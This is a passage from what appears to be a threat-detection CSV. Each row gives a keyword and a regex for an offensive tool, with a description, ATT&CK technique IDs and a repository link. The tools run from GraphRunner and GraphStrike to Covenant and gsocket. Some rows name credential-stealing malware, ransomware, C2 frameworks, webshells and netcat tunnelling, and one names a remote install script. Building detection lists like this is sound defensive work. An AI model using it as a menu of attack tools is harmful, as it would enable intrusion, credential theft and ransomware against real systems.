offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*gpp-decrypt.rb*",".{0,1000}gpp\-decrypt\.rb.{0,1000}","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*GPSCoordinates.exe*",".{0,1000}GPSCoordinates\.exe.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Gr1mmie/AtlasC2*",".{0,1000}Gr1mmie\/AtlasC2.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*grabMinecraftCache(*",".{0,1000}grabMinecraftCache\(.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - 
T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*grabPasswords(self,mkp,bname,pname,data)*",".{0,1000}grabPasswords\(self,mkp,bname,pname,data\).{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*grahamhelton/IMDSpoof*",".{0,1000}grahamhelton\/IMDSpoof.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*GRANT ALL PRIVILEGES ON jasmin_db.*",".{0,1000}GRANT\sALL\sPRIVILEGES\sON\sjasmin_db\..{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" 
"*GrantMailboxAccess.ps1*",".{0,1000}GrantMailboxAccess\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*GrantSamAccessPermission.vbs*",".{0,1000}GrantSamAccessPermission\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*GrantSamAccessPermission.vbs*",".{0,1000}GrantSamAccessPermission\.vbs.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*GraphLdr.x64.bin*",".{0,1000}GraphLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" 
"*GraphLdr.x64.exe*",".{0,1000}GraphLdr\.x64\.exe.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*GraphRunner*access_tokens.txt*",".{0,1000}GraphRunner.{0,1000}access_tokens\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GraphRunner*chatsResponse.json*",".{0,1000}GraphRunner.{0,1000}chatsResponse\.json.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GraphRunner/PHPRedirector*",".{0,1000}GraphRunner\/PHPRedirector.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GraphRunner\PHPRedirector*",".{0,1000}GraphRunner\\PHPRedirector.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation 
tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*GraphRunnerGUI.html*",".{0,1000}GraphRunnerGUI\.html.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*graphspy -i *",".{0,1000}graphspy\s\-i\s.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*GraphSpy.GraphSpy:main*",".{0,1000}GraphSpy\.GraphSpy\:main.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*graphspy.py -i *",".{0,1000}graphspy\.py\s\-i\s.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*GraphStrike Server is running and checking SharePoint for Beacon traffic*",".{0,1000}GraphStrike\sServer\sis\srunning\sand\schecking\sSharePoint\sfor\sBeacon\straffic.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph 
API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*GraphStrike.py *",".{0,1000}GraphStrike\.py\s.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*GreatSCT*",".{0,1000}GreatSCT.{0,1000}","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*GreatSCT.git*",".{0,1000}GreatSCT\.git.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*GreatSCT.py*",".{0,1000}GreatSCT\.py.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*Greenwolf*",".{0,1000}Greenwolf.{0,1000}","offensive_tool_keyword","Greenwolf","A Social Media Mapping Tool that correlates profiles via facial recognition by Jacob Wilkin (Greenwolf).Social Mapper is an Open Source Intelligence Tool that uses facial recognition to correlate social media profiles across different sites on a large scale. It takes an automated approach to search popular social media sites for targets' names and pictures to accurately detect and group a persons presence. outputting the results into report that a human operator can quickly review.Social Mapper has a variety of uses in the security industry. for example the automated gathering of large amounts of social media profiles for use on targeted phishing campaigns. Facial recognition aids this process by removing false positives in the search results. 
so that reviewing this data is quicker for a human operator.","T2348 - T2349 - T2366 - T2423 - T2597 - T2596","TA0011 - TA0022 - TA0026","N/A","N/A","Information Gathering","https://github.com/Greenwolf/social_mapper","1","0","N/A","N/A","10","3685","787","2022-02-25T18:08:41Z","2018-07-07T14:50:07Z" "*gremwell/o365enum*",".{0,1000}gremwell\/o365enum.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*grep-through-commits.sh *",".{0,1000}grep\-through\-commits\.sh\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*Group3r.cs*",".{0,1000}Group3r\.cs.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*Group3r.exe*",".{0,1000}Group3r\.exe.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*Group3r/Group3r*",".{0,1000}Group3r\/Group3r.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","1","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*GruntInjection.exe*",".{0,1000}GruntInjection\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*gruntstager.cs*",".{0,1000}gruntstager\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*GruntStager.exe*",".{0,1000}GruntStager\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*GS_NETCAT_BIN*",".{0,1000}GS_NETCAT_BIN.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*G-Security Webshell*",".{0,1000}G\-Security\sWebshell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*gs-helloworld gs-pipe gs-full-pipe*",".{0,1000}gs\-helloworld\sgs\-pipe\sgs\-full\-pipe.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-mount ~/*",".{0,1000}gs\-mount\s\~\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-mount -s*",".{0,1000}gs\-mount\s\-s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-netcat &*",".{0,1000}gs\-netcat\s\&.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-netcat -*",".{0,1000}gs\-netcat\s\-.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gs-netcat.1*",".{0,1000}gs\-netcat\.1.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket /usr/sbin/sshd*",".{0,1000}gsocket\s\/usr\/sbin\/sshd.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket openvpn *",".{0,1000}gsocket\sopenvpn\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket ssh *",".{0,1000}gsocket\sssh\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket*/gsocket.h*",".{0,1000}gsocket.{0,1000}\/gsocket\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*GSOCKET*Lclient_gs.log*",".{0,1000}GSOCKET.{0,1000}Lclient_gs\.log.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket.1.html*",".{0,1000}gsocket\.1\.html.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket.io/deploy*",".{0,1000}gsocket\.io\/deploy.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket.io/install.sh*",".{0,1000}gsocket\.io\/install\.sh.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_1.*.deb*",".{0,1000}gsocket_1\..{0,1000}\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*GSOCKET_ARGS=*",".{0,1000}GSOCKET_ARGS\=.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-aarch64.tar.gz*",".{0,1000}gsocket_linux\-aarch64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-arm.tar.gz*",".{0,1000}gsocket_linux\-arm\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-armv6.tar.gz*",".{0,1000}gsocket_linux\-armv6\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-armv7l.tar.gz*",".{0,1000}gsocket_linux\-armv7l\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-i686.tar.gz*",".{0,1000}gsocket_linux\-i686\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-mips32.tar.gz*",".{0,1000}gsocket_linux\-mips32\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-mips64.tar.gz*",".{0,1000}gsocket_linux\-mips64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-mipsel.tar.gz*",".{0,1000}gsocket_linux\-mipsel\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_linux-x86_64.tar.gz*",".{0,1000}gsocket_linux\-x86_64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_macOS.tar.gz*",".{0,1000}gsocket_macOS\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*gsocket_openbsd-x86_x64.tar.gz*",".{0,1000}gsocket_openbsd\-x86_x64\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global 